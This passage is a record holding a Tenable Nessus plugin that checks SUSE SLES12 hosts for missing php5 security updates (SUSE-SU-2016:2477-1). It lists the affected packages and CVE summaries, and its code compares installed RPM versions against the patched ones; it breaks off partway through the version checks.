"p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-soap", "p-cpe:/a:novell:suse_linux:php5-soap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sockets", "p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sqlite", "p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo", "p-cpe:/a:novell:suse_linux:php5-suhosin", "p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvsem", "p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvshm", "p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-tokenizer", "p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo", "p-cpe:/a:novell:suse_linux:php5-wddx", "p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlreader", "p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xsl", "p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-zip", "p-cpe:/a:novell:suse_linux:php5-zip-debuginfo", "p-cpe:/a:novell:suse_linux:php5-zlib", "p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-2477-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2477-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119983);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n\n script_name(english:\"SUSE SLES12 Security Update : php5 (SUSE-SU-2016:2477-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php5 fixes the following security issues :\n\n - CVE-2016-7411: php5: Memory corruption when destructing\n deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not\n receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying\n signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in\n msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing\n SplArray\n\n - CVE-2016-7418: NULL pointer dereference in\n php_wddx_push_element\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999819\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=999820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7411/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7413/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7414/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7416/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7417/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7418/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162477-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e883a5d8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2016-1446=1\n\nSUSE Linux Enterprise Module for Web Scripting 12:zypper in -t patch\nSUSE-SLE-Module-Web-Scripting-12-2016-1446=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debugsource-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-imap-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-imap-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-phar-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-phar-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-debuginfo-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-5.5.14-78.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 